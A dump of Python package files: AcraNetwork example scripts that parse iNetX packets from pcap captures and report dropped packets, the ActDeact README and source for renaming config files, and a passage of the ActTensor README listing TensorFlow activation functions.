# What string do we want outputted to the screen. The output format is defined in the coloredop class
outstring =output_format.format(readablemac ,ip_packet.srcip, udp_packet.dstport,inetx_packet.streamid,inetx_packet.sequence)
# Print out one line and the dropped packet info
print(outstring)
# We have a parser aligned block
if inetx_packet.streamid == 0x11121314: # This specific streamid is a parser aligned block
parser_aligned_packet = ParserAligned.ParserAlignedPacket()
# unpack the _payload as the parser data
parser_aligned_packet.unpack(inetx_packet.payload)
# Loop through all the blocks in the packet and spit them out
for pblock in parser_aligned_packet.parserblocks:
(payload_data,) =struct.unpack('>I',pblock.payload)
print("Quadb={:5} Msgcnt={:5} BusId={:4} Elapsed={:20}".format(pblock.quadbytes,pblock.messagecount,pblock.busid,pblock.elapsedtime,payload_data))
packet_count += 1
except NotImplementedError:
# We received a packet that we don't care about. So skip silently
packet_count += 1
pass
except IOError:
# We are at the end of the file so lets jump to the next file
print(( "End of file reached. Packets Per Second ={:5.1f}".format(packet_count/(time.time()-start_of_run))))
break
if __name__ == '__main__':
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/deprecated/parser_aligned_pcap_example.py | parser_aligned_pcap_example.py |
import socket,os,struct,sys
import argparse
import datetime, time
import AcraNetwork.iNetX as inetx
import AcraNetwork.Pcap as pcap
import AcraNetwork.SimpleEthernet as SimpleEthernet
import AcraNetwork.ParserAligned as ParserAligned
def main():
try:
pcapfile = pcap.Pcap("SSR_ABM_102_capture_example1.pcap")
except IOError:
print("ERROR: Could not find input file SSR_ABM_102_capture_example1.pcap")
exit()
# Keep a running count of the packets
packet_count = 1
# Keep a count of previous sequence number to detect a dropped packets
PreviousSeqNum = dict()
while True: # while we are not at the end of the file
try:
# So we loop through the file one packet at a time. This will eventually return an
# exception at the end of file so handle that when it occurs
pcaprecord = pcapfile.readAPacket()
eth = SimpleEthernet.Ethernet()
eth.unpack(pcaprecord.packet)
ip = SimpleEthernet.IP()
ip.unpack(eth.payload)
udp_packet = SimpleEthernet.UDP()
udp_packet.unpack(ip.payload)
(ctrl_word,) = struct.unpack('>I',udp_packet.payload[:4])
if ctrl_word == 0x11000000: # This is a rough guess assuming the control word is 0x11000000
inetx_packet = inetx.iNetX()
inetx_packet.unpack(udp_packet.payload)
#----------------------------
# Check for dropped packet
#----------------------------
if inetx_packet.streamid not in PreviousSeqNum:
PreviousSeqNum[inetx_packet.streamid] = inetx_packet.sequence
else:
if PreviousSeqNum[inetx_packet.streamid]+1 != inetx_packet.sequence:
print("ERROR: Dropped {} packets on streamid={:#x} at packet count={}".format(inetx_packet.sequence - PreviousSeqNum[inetx_packet.streamid] + 1,inetx_packet.streamid,packet_count))
PreviousSeqNum[inetx_packet.streamid] = inetx_packet.sequence
print("----- StreamID={:#10x} SourceIP= {:10s} -----".format(inetx_packet.streamid,ip_packet.srcip))
#--------------------------------------------------------------------------------
# Packets on stream id 0x11121314 is a parser aligned block so lets look at this
#--------------------------------------------------------------------------------
if inetx_packet.streamid == 0x11121314:
parser_aligned_packet = ParserAligned.ParserAlignedPacket()
# unpack the _payload as the parser data
parser_aligned_packet.unpack(inetx_packet.payload)
# Loop through all the blocks in the packet and spit them out
for pblock in parser_aligned_packet.parserblocks:
(payload_data,) =struct.unpack('>I',pblock.payload)
print("Sequence Number = {:8} Quadbyes={:5} Msgcnt={:5} BusId={:4} Elapsed={:20} ".format(inetx_packet.sequence, pblock.quadbytes,pblock.messagecount,pblock.busid,pblock.elapsedtime,payload_data))
packet_count += 1
except NotImplementedError:
# We received a packet that we don't care about. So skip silently
packet_count += 1
pass
except IOError:
# We are at the end of the file so lets jump to the next file
print ( "End of file reached")
exit()
if __name__ == '__main__':
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/deprecated/simple_parser_packets_from_pcap.py | simple_parser_packets_from_pcap.py |
# A very simple [De]Activator for config files
This tool renames files by adding and removing a predefined prefix and suffix. Its intended use is to quickly activate and deactivate config files.
## Installation
```
$ pip install ActDeact
```
## Usage
```
Usage: actDeact [options] args
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-a, --activate Activate file(s)
-d, --deactivate Deactivate file(s)
-v, --verbose Verbose output
-c, --config Show the filename of the config file for editing
```
Also two helper programs `act` and `deact` are provided. They are aliases to `actDeact -a` and `actDeact -d` respectively and pass every argument directly to those programs.
### Example
`actDeact -d foo` renames `foo` to `foo_bak` by default. This is equivalent to `deact foo`.
`actDeact -a foo` renames `foo_bak` to `foo` by default. This is equivalent to `act foo`.
## Configuration
`actDeact -c` shows the filename of the configuration file. Its default content is:
```
[Main]
Prefix=
Suffix=_bak
```
In this file a prefix and a suffix can be set.
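For example, with a configuration like the following (values chosen purely for illustration), `deact foo` renames `foo` to `old_foo.bak` and `act old_foo.bak` renames it back to `foo`:

```
[Main]
Prefix=old_
Suffix=.bak
```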
| ActDeact | /ActDeact-1.0.0.tar.gz/ActDeact-1.0.0/README.md | README.md |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import configparser
import os
from optparse import OptionParser
import pkg_resources
def rreplace(s, old, new, occurrence):
li = s.rsplit(old, occurrence)
return new.join(li)
def main():
configFilename = pkg_resources.resource_filename(__name__, "actDeact.conf")
config = configparser.ConfigParser()
config.read(configFilename)
prefix = ""
suffix = ""
if 'prefix' in config['Main']:
prefix = config['Main']['prefix']
if 'suffix' in config['Main']:
suffix = config['Main']['suffix']
parser = OptionParser(usage="usage: %prog [options] args" ,version="%prog 1.0")
parser.add_option("-a", "--activate", action="store_true", dest="activate", default=False, help="Activate file(s)")
parser.add_option("-d", "--deactivate", action="store_true", dest="deactivate", default=False, help="Deactivate file(s)")
parser.add_option("-c", "--config", action="store_true", dest="config", default=False, help="Show the filename of the config file for editing")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Verbose output")
(options, args) = parser.parse_args()
if options.activate and options.deactivate:
parser.error('options -a and -d are mutually exclusive')
if options.config:
print(configFilename)
if options.deactivate:
for arg in args:
if options.verbose:
print("Deactivating: " , arg , " to ", prefix + arg + suffix)
try:
os.rename(arg, prefix + arg + suffix)
except:
if options.verbose:
print("Error renaming: ", arg)
if options.activate:
for arg in args:
newname = arg
if prefix != "":
newname = newname.replace(prefix , "", 1)
if suffix != "":
newname = rreplace(newname, suffix, "", 1)
if options.verbose:
print("Activating: " , arg , " to ", newname)
try:
os.rename(arg, newname)
except:
if options.verbose:
print("Error renaming: ", arg) | ActDeact | /ActDeact-1.0.0.tar.gz/ActDeact-1.0.0/actDeact/__init__.py | __init__.py |
<div align="center">
<img src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ActTensor%20logo.png"><br>
</div>
---------
# **ActTensor**: Activation Functions for TensorFlow
 
## **What is it?**
ActTensor is a Python package that provides state-of-the-art activation functions, making it easy and fast to use them in Deep Learning projects.
## **Why not using tf.keras.activations?**
As you may know, TensorFlow has only a few built-in activation functions and, most importantly, it does not include newly-introduced ones. Writing another one yourself requires time and energy; this package provides most of the widely-used, as well as state-of-the-art, activation functions ready to use in your models.
## Requirements
- numpy
- tensorflow
- setuptools
- keras
- wheel
## Where to get it?
The source code is currently hosted on GitHub at:
https://github.com/pouyaardehkhani/ActTensor
Binary installers for the latest released version are available at the [Python
Package Index (PyPI)](https://pypi.org/project/ActTensor-tf/)
```sh
# PyPI
pip install ActTensor-tf
```
## License
[MIT](LICENSE)
## How to use?
```python
import tensorflow as tf
import numpy as np
from ActTensor_tf import ReLU # name of the layer
```
functional api
```python
inputs = tf.keras.layers.Input(shape=(28,28))
x = tf.keras.layers.Flatten()(inputs)
x = tf.keras.layers.Dense(128)(x)
# wanted class name
x = ReLU()(x)
output = tf.keras.layers.Dense(10,activation='softmax')(x)
model = tf.keras.models.Model(inputs = inputs,outputs=output)
```
sequential api
```python
model = tf.keras.models.Sequential([tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128),
# wanted class name
ReLU(),
tf.keras.layers.Dense(10, activation = tf.nn.softmax)])
```
NOTE:
> The functions behind the activation layers are also available, but they may be defined under a different name. Check [this](https://github.com/pouyaardehkhani/ActTensor/edit/master/README.md#activations) for more information.
```
from ActTensor_tf import relu
```
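The functional form can also be applied directly to an array or tensor, for example (a quick sketch; the exact return type depends on how the function is implemented):

```python
import numpy as np
from ActTensor_tf import relu

x = np.array([-2.0, -1.0, 0.0, 1.0, 2.0])
y = relu(x)  # negative entries are clipped to 0 -> [0., 0., 0., 1., 2.]
```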
## Activations
Classes and Functions are available in ***ActTensor_tf***
| Activation Name | Class Name | Function Name |
| :---: | :---: | :---: |
| SoftShrink | [SoftShrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L8) | [softSHRINK](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L649) |
| HardShrink | [HardShrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L45) | [hard_shrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L7) |
| GLU | [GLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L82) | - |
| Bilinear | [Bilinear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L99) | - |
| ReGLU | [ReGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L115) | - |
| GeGLU | [GeGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L132) | - |
| SwiGLU | [SwiGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L149) | - |
| SeGLU | [SeGLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L166) | - |
| ReLU | [ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L182) | [relu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L23) |
| Identity | [Identity](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L199) | [identity](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L38) |
| Step | [Step](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L216) | [step](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L52) |
| Sigmoid | [Sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L233) | [sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L67) |
| HardSigmoid | [HardSigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L250) | [hard_sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L81) |
| LogSigmoid | [LogSigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L267) | [log_sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L95) |
| SiLU | [SiLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L284) | [silu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L109) |
| PLinear | [ParametricLinear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L301) | [parametric_linear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L123) |
| Piecewise-Linear | [PiecewiseLinear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L323) | [piecewise_linear](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L139) |
| Complementary Log-Log | [CLL](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L349) | [cll](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L164) |
| Bipolar | [Bipolar](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L366) | [bipolar](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L178) |
| Bipolar-Sigmoid | [BipolarSigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L383) | [bipolar_sigmoid](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L193) |
| Tanh | [Tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L400) | [tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L207) |
| TanhShrink | [TanhShrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L417) | [tanhshrink](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L221) |
| LeCun's Tanh | [LeCunTanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L434) | [leCun_tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L235) |
| HardTanh | [HardTanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L451) | [hard_tanh](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L253) |
| TanhExp | [TanhExp](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L468) | [tanh_exp](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L267) |
| Absolute | [ABS](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L485) | [Abs](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L281) |
| Squared-ReLU | [SquaredReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L502) | [squared_relu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L295) |
| P-ReLU | [ParametricReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L519) | [Parametric_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L310) |
| R-ReLU | [RandomizedReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L541) | [Randomized_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L326) |
| LeakyReLU | [LeakyReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L567) | [leaky_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L346) |
| ReLU6 | [ReLU6](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L584) | [relu6](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L361) |
| Mod-ReLU | [ModReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L601) | [Mod_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L375) |
| Cosine-ReLU | [CosReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L623) | [Cos_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L391) |
| Sin-ReLU | [SinReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L642) | [Sin_ReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L407) |
| Probit | [Probit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L661) | [probit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L423) |
| Cos | [Cos](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L678) | [Cosine](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L437) |
| Gaussian | [Gaussian](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L695) | [gaussian](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L451) |
| Multiquadratic | [Multiquadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L712) | [Multi_quadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L465) |
| Inverse-Multiquadratic | [InvMultiquadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L742) | [Inv_Multi_quadratic](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L487) |
| SoftPlus | [SoftPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L772) | [softPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L509) |
| Mish | [Mish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L789) | [mish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L525) |
| SMish | [Smish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L806) | [smish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L539) |
| P-SMish | [ParametricSmish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L823) | [Parametric_Smish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L553) |
| Swish | [Swish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L853) | [swish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L577) |
| ESwish | [ESwish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L875) | [eswish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L592) |
| HardSwish | [HardSwish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L897) | [hardSwish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L607) |
| GCU | [GCU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L914) | [gcu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L621) |
| CoLU | [CoLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L931) | [colu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L635) |
| PELU | [PELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L948) | [pelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L667) |
| SELU | [SELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L974) | [selu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L685) |
| CELU | [CELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L991) | [celu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L701) |
| ArcTan | [ArcTan](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1013) | [arcTan](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L716) |
| Shifted-SoftPlus | [ShiftedSoftPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1030) | [Shifted_SoftPlus](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L730) |
| Softmax | [Softmax](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1047) | [softmax](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L744) |
| Logit | [Logit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1064) | [logit](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L758) |
| GELU | [GELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1081) | [gelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L772) |
| Softsign | [Softsign](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1098) | [softsign](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L786) |
| ELiSH | [ELiSH](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1115) | [elish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L800) |
| HardELiSH | [HardELiSH](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1132) | [hardELiSH](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L815) |
| Serf | [Serf](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1149) | [serf](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L830) |
| ELU | [ELU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1166) | [elu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L844) |
| Phish | [Phish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1188) | [phish](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L860) |
| QReLU | [QReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1205) | [qrelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L874) |
| MQReLU | [MQReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1222) | [mqrelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L888) |
| FReLU | [FReLU](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/layers.py#L1239) | [frelu](https://github.com/pouyaardehkhani/ActTensor/blob/fd5adadc18b9cf9a060d43e48d3ede7057ff11d3/act_tensor/functions.py#L902) |
<div align="center">
<img src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Activation%20Functions.gif"><br>
</div>
## **Which activation functions does it support?**
1. Soft Shrink:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x-\lambda&space;&&space;x&space;>&space;\lambda\\&space;x+\lambda&space;&&space;x&space;<&space;-\lambda\\&space;0&space;&&space;otherwise&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SoftShrink.png">
</p>
2. Hard Shrink:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\begin{cases}x&space;&&space;x&space;>&space;\lambda\\&space;x&space;&&space;x&space;<&space;-\lambda\\&space;0&space;&&space;otherwise&space;\end{cases}">
<p align="center">
